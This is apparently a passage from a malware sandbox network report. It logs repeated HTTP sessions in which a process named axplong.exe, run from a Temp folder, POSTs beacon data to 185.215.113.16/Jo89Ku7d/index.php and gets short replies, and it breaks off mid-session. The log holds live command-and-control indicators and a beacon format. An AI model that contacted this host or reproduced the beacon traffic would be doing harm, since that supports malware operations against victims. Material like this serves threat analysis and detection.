30	192.168.2.5	62701	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:35.956104994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:36.675163031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:36.677911043 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:36.910748005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	62702	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:37.018524885 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:37.724263906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:37.725100040 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:37.964622974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	62703	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:38.081231117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:38.798372984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:38.799134970 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:39.031666994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	62704	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:39.145750999 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:39.845962048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:39.846739054 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:40.074470997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	62705	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:40.190999985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:40.904206038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:40.904901981 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:41.133363008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	62706	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:41.253251076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:41.955745935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:41.959139109 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:42.183733940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	62707	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:42.300235033 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:43.018131018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:43.019157887 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:43.246922970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	62708	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:43.362610102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:44.065419912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:44.068031073 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:44.292815924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	62709	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:44.410396099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:45.125503063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:45.126442909 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:45.357131004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	62710	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:45.472099066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:46.206805944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:46.209564924 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:46.446253061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	62711	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:46.565547943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:47.257476091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:47.258428097 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:47.481792927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	62712	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:47.597176075 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:48.345901012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:48.346944094 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:48.575758934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	62713	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:48.692105055 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:49.394155979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
